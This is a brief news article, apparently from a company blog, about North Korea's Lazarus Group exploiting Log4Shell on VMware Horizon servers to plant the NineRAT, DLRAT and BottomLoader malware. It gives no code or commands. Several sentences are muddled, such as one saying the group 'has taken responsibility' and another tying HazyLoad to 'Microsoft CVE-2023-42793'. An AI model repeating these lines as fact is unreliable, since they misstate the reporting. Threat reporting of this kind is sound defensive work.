Lazarus Group Applies LOG4J exploits to Deploy Remote Access Trojans

In a new global campaign, the infamous North Korea-linked threat group known as the Lazarus Group has taken responsibility for Operation Blacksmith. In this operation, they opportunistically exploit vulnerabilities in Log4j to deploy previously undocumented Remote Access Trojans (RATs) on compromised systems.

The activity, tracked by Cisco Talos, reveals the use of three DLang-based malware families, highlighting a RAT called NineRAT that uses Telegram for command and control (C2), along with DLRAT and a downloader called BottomLoader.

The Lazarus Group’s recent tactics overlap with the group known as Andariel, a subgroup within Lazarus, which is generally tasked with initial access, reconnaissance, and establishing long-term access for espionage in support of North Korea’s national interests.

The attack chain involves exploiting the CVE-2021-44228 (Log4Shell) vulnerability in publicly accessible VMWare Horizon servers to deliver NineRAT. Notable sectors affected include manufacturing, agriculture and physical security.

NineRAT, developed around May 2022, has been used in attacks targeting a South American agricultural organization in March 2023 and a European manufacturing entity in September 2023. This RAT uses Telegram for C2 communications, seeking to evade detection.

Additionally, a custom proxy tool called HazyLoad, previously identified by Microsoft CVE-2023-42793, is used, which is downloaded and executed by another malware called BottomLoader. Also seen is the delivery of DLRAT, which functions as a downloader and RAT, allowing system recognition, deployment of additional malware, and recovery of C2 commands for execution on compromised systems.

Redundancy in multiple backdoor tools provides the Lazarus Group with high access persistence, allowing them to maintain control even if a tool is discovered. The importance of continued use of Log4Shell is highlighted, as a significant percentage of applications still use vulnerable versions of the library.

This revelation comes as AhnLab’s Security Emergency Response Center (ASEC) details Kimsuky’s use of AutoIt malware versions such as Amadey and RftRAT, distributed through spear-phishing attacks with deceptive attachments and links to evade detection by security products. Stay alert and up to date on the latest cyber threats to ensure the security of their systems.

Related Posts
Clear Filters

En un reciente estudio, Wiz Research ha identificado vulnerabilidades críticas en SAP AI Core, una plataforma de inteligencia artificial gestionada…

Devel Group
Privacy Preferences
When you visit our website, it may store information through your browser from specific services, usually in form of cookies. Here you can change your privacy preferences. Please note that blocking some types of cookies may impact your experience on our website and the services we offer.